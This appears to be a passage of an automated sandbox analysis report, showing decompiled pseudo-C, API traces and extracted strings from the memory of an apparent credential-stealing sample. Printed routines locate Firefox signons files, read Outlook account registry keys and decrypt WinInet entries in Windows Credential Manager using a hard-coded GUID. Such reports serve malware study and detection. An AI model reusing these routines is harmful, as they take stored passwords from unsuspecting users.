                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Stringstrcpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                        • String ID: TranslatorName$TranslatorURL$general$strings
                                                                        • API String ID: 1060401815-3647959541
                                                                        • Opcode ID: acaf4a6ca7367b184f6fdf17ade1074e09c73fb74d797c334c49b365d943b025
                                                                        • Instruction ID: d5eae57ffc3fdd8f11c9b4c351fac369e1a37aafa95eb04bb89d09d1e585c4c7
                                                                        • Opcode Fuzzy Hash: acaf4a6ca7367b184f6fdf17ade1074e09c73fb74d797c334c49b365d943b025
                                                                        • Instruction Fuzzy Hash: 6E1104319802543AD7212B56DC06FCB3E6DCF85B59F1040BBB708B6191C9BC9EC087AD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 83%
                                                                        			E0040D1EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
                                                                        				void _v267;
                                                                        				char _v268;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* _t31;
                                                                        				int _t40;
                                                                        				void* _t44;
                                                                        				void* _t49;
                                                                        				char* _t50;
                                                                        				void* _t57;
                                                                        				int _t62;
                                                                        				char* _t68;
                                                                        				void* _t70;
                                                                        				void* _t73;
                                                                        				void* _t74;
                                                                        				intOrPtr* _t86;
                                                                        				char* _t89;
                                                                        				void* _t90;
                                                                        				char** _t91;
                                                                        
                                                                        				_t86 = __eax;
                                                                        				_t31 = E00406C2F(__eax + 0x1c, __eax, __eflags, _a4);
                                                                        				_t94 = _t31;
                                                                        				if(_t31 == 0) {
                                                                        					__eflags = 0;
                                                                        					return 0;
                                                                        				}
                                                                        				E0040462E(_t86 + 0x468);
                                                                        				_t68 = _t86 + 0x158;
                                                                        				E004061FF(_t68, _a4);
                                                                        				_t89 = _t86 + 0x25d;
                                                                        				 *_t89 = 0;
                                                                        				E0040C530(_t94, _t86 + 0x18);
                                                                        				if( *_t89 == 0) {
                                                                        					_t62 = strlen(_t68);
                                                                        					 *_t91 = "signons.txt";
                                                                        					_t9 = strlen(??) + 1; // 0x1
                                                                        					if(_t62 + _t9 >= 0x104) {
                                                                        						 *_t89 = 0;
                                                                        					} else {
                                                                        						E004062AD(_t89, _t86 + 0x158, "signons.txt");
                                                                        					}
                                                                        				}
                                                                        				_v268 = 0;
                                                                        				memset( &_v267, 0, 0x104);
                                                                        				_t40 = strlen(_t86 + 0x158);
                                                                        				_t91[3] = "signons.sqlite";
                                                                        				_t15 = strlen(??) + 1; // 0x1
                                                                        				_pop(_t73);
                                                                        				if(_t40 + _t15 >= 0x104) {
                                                                        					_v268 = 0;
                                                                        				} else {
                                                                        					E004062AD( &_v268, _t86 + 0x158, "signons.sqlite");
                                                                        					_pop(_t73);
                                                                        				}
                                                                        				_t98 =  *_t89;
                                                                        				if( *_t89 != 0) {
                                                                        					_t57 = E00406C2F(_t86 + 4, _t86, _t98, _t89);
                                                                        					_t99 = _t57;
                                                                        					if(_t57 != 0) {
                                                                        						E0040C475(_t73, _t86, _t99);
                                                                        					}
                                                                        				}
                                                                        				_t44 = E0040614B( &_v268);
                                                                        				_t100 = _t44;
                                                                        				_pop(_t74);
                                                                        				if(_t44 != 0) {
                                                                        					E0040CE28(_t74, _t100, _t86,  &_v268);
                                                                        				}
                                                                        				_t70 = 0;
                                                                        				if( *((intOrPtr*)(_t86 + 0x474)) <= 0) {
                                                                        					L19:
                                                                        					return 1;
                                                                        				} else {
                                                                        					do {
                                                                        						_t90 = E0040D438(_t70, _t86 + 0x468);
                                                                        						_t24 = _t90 + 0x504; // 0x504
                                                                        						_t49 = _t24;
                                                                        						_push("none");
                                                                        						_push(_t49);
                                                                        						L004115B2();
                                                                        						if(_t49 != 0) {
                                                                        							_t25 = _t90 + 4; // 0x4
                                                                        							_t50 = _t25;
                                                                        							if( *_t50 == 0) {
                                                                        								_t26 = _t90 + 0x204; // 0x204
                                                                        								strcpy(_t50, _t26);
                                                                        							}
                                                                        							 *((intOrPtr*)( *_t86 + 4))(_t90);
                                                                        						}
                                                                        						_t70 = _t70 + 1;
                                                                        					} while (_t70 <  *((intOrPtr*)(_t86 + 0x474)));
                                                                        					goto L19;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                          • Part of subcall function 00406C2F: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040D205,?,?,?,?), ref: 00406C48
                                                                          • Part of subcall function 00406C2F: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00406C74
                                                                          • Part of subcall function 0040462E: free.MSVCRT(00000000,0040BC35), ref: 00404635
                                                                          • Part of subcall function 004061FF: strcpy.MSVCRT(?,?,0040D228,?,?,?,?,?), ref: 00406204
                                                                          • Part of subcall function 004061FF: strrchr.MSVCRT ref: 0040620C
                                                                          • Part of subcall function 0040C530: memset.MSVCRT ref: 0040C551
                                                                          • Part of subcall function 0040C530: memset.MSVCRT ref: 0040C565
                                                                          • Part of subcall function 0040C530: memset.MSVCRT ref: 0040C579
                                                                          • Part of subcall function 0040C530: memcpy.MSVCRT ref: 0040C646
                                                                          • Part of subcall function 0040C530: memcpy.MSVCRT ref: 0040C6A6
                                                                        • strlen.MSVCRT ref: 0040D241
                                                                        • strlen.MSVCRT ref: 0040D24F
                                                                          • Part of subcall function 004062AD: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062B5
                                                                          • Part of subcall function 004062AD: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062C4
                                                                        • memset.MSVCRT ref: 0040D28F
                                                                        • strlen.MSVCRT ref: 0040D29E
                                                                        • strlen.MSVCRT ref: 0040D2AC
                                                                        • _stricmp.MSVCRT(00000504,none,?,?,?), ref: 0040D339
                                                                        • strcpy.MSVCRT(00000004,00000204,?,?,?), ref: 0040D354
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: memsetstrlen$strcpy$memcpy$CloseFileHandleSize_stricmpfreestrcatstrrchr
                                                                        • String ID: none$signons.sqlite$signons.txt
                                                                        • API String ID: 2681923396-1088577317
                                                                        • Opcode ID: 320e3f5b2275387b9dd69f73878994cc1174bc0b0e146de94454896ca0fe85a1
                                                                        • Instruction ID: 747294efef189d2a86bae337d02489a359e47e35f4212505bb9232dde5c11721
                                                                        • Opcode Fuzzy Hash: 320e3f5b2275387b9dd69f73878994cc1174bc0b0e146de94454896ca0fe85a1
                                                                        • Instruction Fuzzy Hash: 3041E3B1508246AAD710EBB1CC81BDAB798AF40305F10057FE596E21C2EB7CE9C9876D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00402C44(void* __ecx, void* __fp0, intOrPtr _a4) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				char _v16;
                                                                        				char _v20;
                                                                        				void _v275;
                                                                        				char _v276;
                                                                        				void _v1299;
                                                                        				char _v1300;
                                                                        				void* __esi;
                                                                        				void* _t35;
                                                                        				intOrPtr _t36;
                                                                        				void* _t40;
                                                                        				void* _t52;
                                                                        				void* _t58;
                                                                        				void* _t60;
                                                                        				void* _t64;
                                                                        				char* _t66;
                                                                        				void* _t73;
                                                                        				void* _t74;
                                                                        				void* _t75;
                                                                        				void* _t76;
                                                                        				void* _t77;
                                                                        				void* _t83;
                                                                        
                                                                        				_t83 = __fp0;
                                                                        				_t64 = __ecx;
                                                                        				_t35 = E0040EB3F(0x80000001, "Identities",  &_v8);
                                                                        				_t74 = _t73 + 0xc;
                                                                        				if(_t35 == 0) {
                                                                        					_v12 = 0;
                                                                        					_v276 = 0;
                                                                        					memset( &_v275, 0, 0xff);
                                                                        					_t40 = E0040EC05(_v8, 0,  &_v276);
                                                                        					_t75 = _t74 + 0x18;
                                                                        					if(_t40 == 0) {
                                                                        						_t66 = "%s\\%s";
                                                                        						do {
                                                                        							_t69 = _a4;
                                                                        							E0040EBC1(_t64, _v8,  &_v276, "Username", _a4 + 0xa9c, 0x7f);
                                                                        							_v1300 = 0;
                                                                        							memset( &_v1299, 0, 0x3ff);
                                                                        							sprintf( &_v1300, _t66,  &_v276, "Software\\Microsoft\\Internet Account Manager\\Accounts");
                                                                        							_t52 = E0040EB3F(_v8,  &_v1300,  &_v16);
                                                                        							_t76 = _t75 + 0x3c;
                                                                        							_t80 = _t52;
                                                                        							if(_t52 == 0) {
                                                                        								E00402BB8(_t64,  &_v16, _t80, _t83, _t69, 1);
                                                                        							}
                                                                        							sprintf( &_v1300, _t66,  &_v276, "Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts");
                                                                        							_t58 = E0040EB3F(_v8,  &_v1300,  &_v20);
                                                                        							_t77 = _t76 + 0x1c;
                                                                        							_t81 = _t58;
                                                                        							if(_t58 == 0) {
                                                                        								E00402BB8(_t64,  &_v20, _t81, _t83, _a4, 5);
                                                                        							}
                                                                        							_v12 = _v12 + 1;
                                                                        							_t60 = E0040EC05(_v8, _v12,  &_v276);
                                                                        							_t75 = _t77 + 0xc;
                                                                        						} while (_t60 == 0);
                                                                        					}
                                                                        					RegCloseKey(_v8);
                                                                        				}
                                                                        				_t36 = _a4;
                                                                        				 *((char*)(_t36 + 0xa9c)) = 0;
                                                                        				return _t36;
                                                                        			}

                                                                        APIs
                                                                          • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                        • memset.MSVCRT ref: 00402C84
                                                                          • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32 ref: 0040EC28
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00402D86
                                                                          • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                                        • memset.MSVCRT ref: 00402CDE
                                                                        • sprintf.MSVCRT ref: 00402CF7
                                                                        • sprintf.MSVCRT ref: 00402D35
                                                                          • Part of subcall function 00402BB8: memset.MSVCRT ref: 00402BD8
                                                                          • Part of subcall function 00402BB8: RegCloseKey.ADVAPI32 ref: 00402C3C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Closememset$sprintf$EnumOpen
                                                                        • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                                        • API String ID: 1831126014-3814494228
                                                                        • Opcode ID: e558669e5098f51d47a130cd26e8095db06e1949dd15f7d6cacb61a667ea587b
                                                                        • Instruction ID: 6c0256c292ffb55b53f7a2730c4bcad7d13cefd93b753116a94389aae211c0df
                                                                        • Opcode Fuzzy Hash: e558669e5098f51d47a130cd26e8095db06e1949dd15f7d6cacb61a667ea587b
                                                                        • Instruction Fuzzy Hash: 25315C72D0011DBADB11EA96CD46EEFB77CAF04344F0405BABA19F2091E6B49F988F54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E0040B53C(void* __ecx, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
                                                                        				void* _v8;
                                                                        				intOrPtr _v20;
                                                                        				void* _v24;
                                                                        				void* _v28;
                                                                        				void* __ebx;
                                                                        				void* __esi;
                                                                        				signed int _t45;
                                                                        				intOrPtr _t50;
                                                                        				signed int _t53;
                                                                        				intOrPtr _t82;
                                                                        				signed char _t86;
                                                                        				intOrPtr _t88;
                                                                        				intOrPtr _t90;
                                                                        				void* _t91;
                                                                        				void* _t92;
                                                                        
                                                                        				_t84 = __ecx;
                                                                        				_t88 = _a4;
                                                                        				_t92 = _t88 - 0x402;
                                                                        				_t91 = __ecx;
                                                                        				if(_t92 > 0) {
                                                                        					_t45 = _t88 - 0x415;
                                                                        					__eflags = _t45;
                                                                        					if(_t45 == 0) {
                                                                        						E0040A4C8(__ecx);
                                                                        						L22:
                                                                        						__eflags = 0;
                                                                        						E0040A27F(0, _t84, _t91, 0);
                                                                        						L23:
                                                                        						if(_t88 ==  *((intOrPtr*)(_t91 + 0x374))) {
                                                                        							_t81 = _a12;
                                                                        							_t86 =  *(_a12 + 0xc);
                                                                        							_t50 =  *((intOrPtr*)(_t91 + 0x370));
                                                                        							if((_t86 & 0x00000008) == 0) {
                                                                        								__eflags = _t86 & 0x00000040;
                                                                        								if((_t86 & 0x00000040) != 0) {
                                                                        									 *0x4171ac =  *0x4171ac & 0x00000000;
                                                                        									__eflags =  *0x4171ac;
                                                                        									SetFocus( *(_t50 + 0x184));
                                                                        								}
                                                                        							} else {
                                                                        								E00409D7E(_t50, _t81);
                                                                        							}
                                                                        						}
                                                                        						return E004019AC(_t91, _t88, _a8, _a12);
                                                                        					}
                                                                        					_t53 = _t45 - 1;
                                                                        					__eflags = _t53;
                                                                        					if(_t53 == 0) {
                                                                        						E0040A56C(__ecx);
                                                                        						goto L22;
                                                                        					}
                                                                        					__eflags = _t53 == 6;
                                                                        					if(_t53 == 6) {
                                                                        						SetFocus( *(__ecx + 0x378));
                                                                        					}
                                                                        					goto L23;
                                                                        				}
                                                                        				if(_t92 == 0) {
                                                                        					 *(__ecx + 0x25c) =  *(__ecx + 0x25c) & 0x00000000;
                                                                        					E0040A437(__ecx);
                                                                        					goto L22;
                                                                        				}
                                                                        				if(_t88 == 0x1c) {
                                                                        					__eflags = _a8;
                                                                        					if(_a8 == 0) {
                                                                        						 *((intOrPtr*)(_t91 + 0x378)) = GetFocus();
                                                                        					} else {
                                                                        						PostMessageA( *(__ecx + 0x108), 0x41c, 0, 0);
                                                                        					}
                                                                        					goto L23;
                                                                        				}
                                                                        				if(_t88 == 0x20) {
                                                                        					__eflags = _a8 -  *((intOrPtr*)(__ecx + 0x114));
                                                                        					if(_a8 !=  *((intOrPtr*)(__ecx + 0x114))) {
                                                                        						goto L23;
                                                                        					}
                                                                        					SetCursor(LoadCursorA( *0x416b94, 0x67));
                                                                        					return 1;
                                                                        				}
                                                                        				if(_t88 == 0x2b) {
                                                                        					_t82 = _a12;
                                                                        					__eflags =  *((intOrPtr*)(_t82 + 0x14)) -  *((intOrPtr*)(__ecx + 0x114));
                                                                        					if( *((intOrPtr*)(_t82 + 0x14)) ==  *((intOrPtr*)(__ecx + 0x114))) {
                                                                        						SetBkMode( *(_t82 + 0x18), 1);
                                                                        						SetTextColor( *(_t82 + 0x18), 0xff0000);
                                                                        						_v8 = SelectObject( *(_t82 + 0x18),  *(__ecx + 0x258));
                                                                        						asm("stosd");
                                                                        						asm("stosd");
                                                                        						asm("stosd");
                                                                        						asm("stosd");
                                                                        						_t90 = _a12;
                                                                        						_v28 = 0x14;
                                                                        						_v20 = 5;
                                                                        						DrawTextExA( *(_t90 + 0x18), __ecx + 0x158, 0xffffffff, _t90 + 0x1c, 4,  &_v28);
                                                                        						SelectObject( *(_t90 + 0x18), _v8);
                                                                        						_t88 = _a4;
                                                                        					}
                                                                        				} else {
                                                                        					if(_t88 == 0x7b) {
                                                                        						_t87 = _a8;
                                                                        						if(_a8 ==  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x370)) + 0x184))) {
                                                                        							E0040B372(__ecx, _t87);
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				goto L23;
                                                                        			}

                                                                        APIs
                                                                        • SetBkMode.GDI32(?,00000001), ref: 0040B5B5
                                                                        • SetTextColor.GDI32(?,00FF0000), ref: 0040B5C3
                                                                        • SelectObject.GDI32(?,?), ref: 0040B5D8
                                                                        • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040B60D
                                                                        • SelectObject.GDI32(00000014,?), ref: 0040B619
                                                                          • Part of subcall function 0040B372: GetCursorPos.USER32(?), ref: 0040B37F
                                                                          • Part of subcall function 0040B372: GetSubMenu.USER32 ref: 0040B38D
                                                                          • Part of subcall function 0040B372: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040B3BA
                                                                        • LoadCursorA.USER32 ref: 0040B63A
                                                                        • SetCursor.USER32(00000000), ref: 0040B641
                                                                        • PostMessageA.USER32 ref: 0040B663
                                                                        • SetFocus.USER32(?), ref: 0040B69E
                                                                        • SetFocus.USER32(?), ref: 0040B6EF
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                        • String ID:
                                                                        • API String ID: 1416211542-0
                                                                        • Opcode ID: ada7ac9db0802c40b78b434d5b067a752f7538f931aaa86afb59dd9be5820f54
                                                                        • Instruction ID: 8f05fcf81e8b57b2917fe7890bba9475612e1218cdf4c3fdd04c744704700eb5
                                                                        • Opcode Fuzzy Hash: ada7ac9db0802c40b78b434d5b067a752f7538f931aaa86afb59dd9be5820f54
                                                                        • Instruction Fuzzy Hash: E741A271100605EFCB119F64CD89EEE7775FB08300F104936E615A62A1CB799D91DBDE
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • strcpy.MSVCRT(?,Common Programs,0040EEF9,?,?,?,?,?,00000104), ref: 0040EE4E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: strcpy
                                                                        • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                        • API String ID: 3177657795-318151290
                                                                        • Opcode ID: 69181002a60778507a3d541a40da82393cbcfb54362146d699c3396572d884a2
                                                                        • Instruction ID: 838bbb5fcb7671a25bd4d31fd75230584a1d4f3c41bb848f6a939ae912ddcdf8
                                                                        • Opcode Fuzzy Hash: 69181002a60778507a3d541a40da82393cbcfb54362146d699c3396572d884a2
                                                                        • Instruction Fuzzy Hash: 66F0BDB32A878EF0D429496BCD4AEB744429151B46B7C4D37A002B46D5E87D8AF260DF
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 74%
                                                                        			E0040765B(void* __eflags, intOrPtr* _a4) {
                                                                        				char _v532;
                                                                        				short _v534;
                                                                        				void _v1042;
                                                                        				void _v1044;
                                                                        				long _v1080;
                                                                        				intOrPtr _v1084;
                                                                        				intOrPtr _v1088;
                                                                        				intOrPtr _v1096;
                                                                        				int _v1104;
                                                                        				char _v1108;
                                                                        				intOrPtr _v1112;
                                                                        				intOrPtr _v1116;
                                                                        				intOrPtr _v1120;
                                                                        				intOrPtr _v1124;
                                                                        				intOrPtr _v1128;
                                                                        				intOrPtr _v1132;
                                                                        				long* _v1136;
                                                                        				wchar_t* _v1140;
                                                                        				wchar_t* _v1144;
                                                                        				intOrPtr _v1148;
                                                                        				char _v1152;
                                                                        				intOrPtr _v1156;
                                                                        				char _v1160;
                                                                        				void* _v1164;
                                                                        				void* _v1168;
                                                                        				int _v1172;
                                                                        				intOrPtr _v1176;
                                                                        				char _v1180;
                                                                        				char _v1184;
                                                                        				signed int _v1188;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* _t76;
                                                                        				int _t83;
                                                                        				wchar_t* _t109;
                                                                        				wchar_t* _t110;
                                                                        				signed int _t120;
                                                                        				int _t126;
                                                                        				void* _t129;
                                                                        				intOrPtr _t134;
                                                                        				signed int _t140;
                                                                        				void* _t142;
                                                                        				void* _t143;
                                                                        				void* _t144;
                                                                        
                                                                        				_t142 = (_t140 & 0xfffffff8) - 0x4a4;
                                                                        				_push(_t129);
                                                                        				_v1108 = 0;
                                                                        				_v1104 = 0;
                                                                        				if(E00404647( &_v1108, _t129, __eflags) != 0) {
                                                                        					_v1184 = 0;
                                                                        					_v1180 = 0;
                                                                        					if(_v1088 == 0) {
                                                                        						_t76 = 0;
                                                                        						__eflags = 0;
                                                                        					} else {
                                                                        						_t76 = _v1084(0, 0,  &_v1180,  &_v1184);
                                                                        					}
                                                                        					if(_t76 != 0) {
                                                                        						_t120 = 9;
                                                                        						memcpy( &_v1080, L"Microsoft_WinInet", _t120 << 2);
                                                                        						_t143 = _t142 + 0xc;
                                                                        						_v1172 = wcslen( &_v1080);
                                                                        						_v1176 = 1;
                                                                        						_v1188 = 0;
                                                                        						if(_v1180 > 0) {
                                                                        							while(_v1176 != 0) {
                                                                        								_t134 =  *((intOrPtr*)(_v1184 + _v1188 * 4));
                                                                        								_t83 = wcsncmp( *(_t134 + 8),  &_v1080, _v1172);
                                                                        								_t143 = _t143 + 0xc;
                                                                        								if(_t83 == 0) {
                                                                        									do {
                                                                        										_t25 = L"abe2869f-9b47-4cd9-a358-c22904dba7f7" + _t83; // 0x620061
                                                                        										 *(_t83 + 0x417968) =  *_t25 << 2;
                                                                        										_t83 = _t83 + 2;
                                                                        										_t152 = _t83 - 0x4a;
                                                                        									} while (_t83 < 0x4a);
                                                                        									_v1148 =  *((intOrPtr*)(_t134 + 0x1c));
                                                                        									_t139 =  &_v532;
                                                                        									_v1160 = 0x4a;
                                                                        									_v1156 = 0x417968;
                                                                        									_v1152 =  *((intOrPtr*)(_t134 + 0x18));
                                                                        									E004046D7( &_v532);
                                                                        									if(E004047A0( &_v532, _t152) != 0 && E00404811(_t139,  &_v1152,  &_v1160,  &_v1168) != 0) {
                                                                        										_v1044 = 0;
                                                                        										memset( &_v1042, 0, 0x1fe);
                                                                        										_t126 = _v1168;
                                                                        										_t144 = _t143 + 0xc;
                                                                        										if(_t126 > 0x1fa) {
                                                                        											_t126 = 0x1fa;
                                                                        										}
                                                                        										memcpy( &_v1044, _v1164, _t126);
                                                                        										_v1120 =  *((intOrPtr*)(_t134 + 0x20));
                                                                        										_v1124 =  *((intOrPtr*)(_t134 + 4));
                                                                        										_v1116 =  *((intOrPtr*)(_t134 + 0x10));
                                                                        										_v1112 =  *((intOrPtr*)(_t134 + 0x14));
                                                                        										_v1128 =  *((intOrPtr*)(_t134 + 0x2c));
                                                                        										_v1144 =  *(_t134 + 8);
                                                                        										_v1132 =  *((intOrPtr*)(_t134 + 0xc));
                                                                        										_t109 =  &_v1044;
                                                                        										_v534 = 0;
                                                                        										_v1140 = _t109;
                                                                        										_v1136 = 0x4125f4;
                                                                        										_t110 = wcschr(_t109, 0x3a);
                                                                        										_t143 = _t144 + 0x14;
                                                                        										if(_t110 != 0) {
                                                                        											 *_t110 = 0;
                                                                        											_v1136 =  &(_t110[0]);
                                                                        										}
                                                                        										_v1180 =  *((intOrPtr*)( *_a4))( &_v1144);
                                                                        										LocalFree(_v1168);
                                                                        									}
                                                                        									E004047F1( &_v532);
                                                                        								}
                                                                        								_v1188 = _v1188 + 1;
                                                                        								if(_v1188 < _v1180) {
                                                                        									continue;
                                                                        								}
                                                                        								goto L18;
                                                                        							}
                                                                        						}
                                                                        						L18:
                                                                        						_v1096(_v1184);
                                                                        					}
                                                                        				}
                                                                        				return E004046C2( &_v1108);
                                                                        			}
                                                                        0x0040772d
                                                                        0x00407735
                                                                        0x0040773c
                                                                        0x00407743
                                                                        0x0040774b
                                                                        0x00407753
                                                                        0x00407757
                                                                        0x00407763
                                                                        0x00407795
                                                                        0x0040779d
                                                                        0x004077a2
                                                                        0x004077ab
                                                                        0x004077b0
                                                                        0x004077b2
                                                                        0x004077b2
                                                                        0x004077c1
                                                                        0x004077c9
                                                                        0x004077d0
                                                                        0x004077d7
                                                                        0x004077de
                                                                        0x004077e5
                                                                        0x004077ec
                                                                        0x004077f3
                                                                        0x004077f7
                                                                        0x00407801
                                                                        0x00407809
                                                                        0x0040780d
                                                                        0x00407815
                                                                        0x0040781a
                                                                        0x0040781f
                                                                        0x00407821
                                                                        0x00407827
                                                                        0x00407827
                                                                        0x0040783b
                                                                        0x0040783f
                                                                        0x0040783f
                                                                        0x0040784c
                                                                        0x0040784c
                                                                        0x00407851
                                                                        0x0040785d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040785d
                                                                        0x004076e5
                                                                        0x00407863
                                                                        0x00407867
                                                                        0x00407867
                                                                        0x004076ac
                                                                        0x0040787a

                                                                        APIs
                                                                          • Part of subcall function 00404647: LoadLibraryA.KERNEL32(advapi32.dll,?,0040D601,80000001,73AFF420), ref: 00404654
                                                                          • Part of subcall function 00404647: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 0040466D
                                                                          • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredFree), ref: 00404679
                                                                          • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404685
                                                                          • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404691
                                                                          • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040469D
                                                                        • wcslen.MSVCRT ref: 004076C5
                                                                        • wcsncmp.MSVCRT(?,?,?), ref: 00407709
                                                                        • memset.MSVCRT ref: 0040779D
                                                                        • memcpy.MSVCRT ref: 004077C1
                                                                        • wcschr.MSVCRT ref: 00407815
                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 0040783F
                                                                          • Part of subcall function 004047F1: FreeLibrary.KERNELBASE(?,?), ref: 00404806
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressProc$FreeLibrary$LoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                        • String ID: J$Microsoft_WinInet$hyA
                                                                        • API String ID: 2413121283-319027496
                                                                        • Opcode ID: 3dbe31861b291603ba55481dc935e5bf9676d9bb6e305c4de7996f9a1c48bd4b
                                                                        • Instruction ID: ab6451454baefbc6762688e22d5ebab6c31fbbbf8d38218599acfc9a6d4ef790
                                                                        • Opcode Fuzzy Hash: 3dbe31861b291603ba55481dc935e5bf9676d9bb6e305c4de7996f9a1c48bd4b
                                                                        • Instruction Fuzzy Hash: 2751E4B1908345AFC710EF65C88495AB7E8FF89304F00492EFA99D3250E778E955CB57
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 48%
                                                                        			E00407A64(void* __ecx, void* __eflags, int _a4, struct tagMENUITEMINFOA _a8, intOrPtr _a12, int _a24, intOrPtr _a28, char* _a44, int _a48, char _a56, void _a57, char _a4160, void _a4161) {
                                                                        				char* _v0;
                                                                        				int _v4;
                                                                        				int _t39;
                                                                        				char* _t49;
                                                                        				void* _t51;
                                                                        				int _t64;
                                                                        				signed int _t70;
                                                                        				signed int _t71;
                                                                        
                                                                        				_t59 = __ecx;
                                                                        				_t71 = _t70 & 0xfffffff8;
                                                                        				E004118A0(0x204c, __ecx);
                                                                        				_t39 = GetMenuItemCount(_a8.cbSize);
                                                                        				_a4 = _t39;
                                                                        				_v4 = 0;
                                                                        				if(_t39 <= 0) {
                                                                        					L15:
                                                                        					return _t39;
                                                                        				} else {
                                                                        					do {
                                                                        						memset( &_a57, 0, 0x1000);
                                                                        						_t71 = _t71 + 0xc;
                                                                        						_a44 =  &_a56;
                                                                        						_a8.cbSize = 0x30;
                                                                        						_a12 = 0x36;
                                                                        						_a48 = 0x1000;
                                                                        						_a56 = 0;
                                                                        						if(GetMenuItemInfoA(_a8.cbSize, _v4, 1,  &_a8) == 0) {
                                                                        							goto L14;
                                                                        						}
                                                                        						if(_a56 == 0) {
                                                                        							L12:
                                                                        							_t80 = _a28;
                                                                        							if(_a28 != 0) {
                                                                        								_push(0);
                                                                        								_push(_a28);
                                                                        								_push(_a4);
                                                                        								E00407A64(_t59, _t80);
                                                                        								_t71 = _t71 + 0xc;
                                                                        							}
                                                                        							goto L14;
                                                                        						}
                                                                        						_t64 = _a24;
                                                                        						_a4160 = 0;
                                                                        						memset( &_a4161, 0, 0x1000);
                                                                        						_t49 = strchr( &_a56, 9);
                                                                        						_t71 = _t71 + 0x14;
                                                                        						_v0 = _t49;
                                                                        						if(_a28 != 0) {
                                                                        							if(_a12 == 0) {
                                                                        								 *0x4171b4 =  *0x4171b4 + 1;
                                                                        								_t64 =  *0x4171b4 + 0x11558;
                                                                        								__eflags = _t64;
                                                                        							} else {
                                                                        								_t64 = _v4 + 0x11171;
                                                                        							}
                                                                        						}
                                                                        						_t51 = E00407D89(_t64,  &_a4160);
                                                                        						_pop(_t59);
                                                                        						if(_t51 != 0) {
                                                                        							if(_v0 != 0) {
                                                                        								strcat( &_a4160, _v0);
                                                                        								_pop(_t59);
                                                                        							}
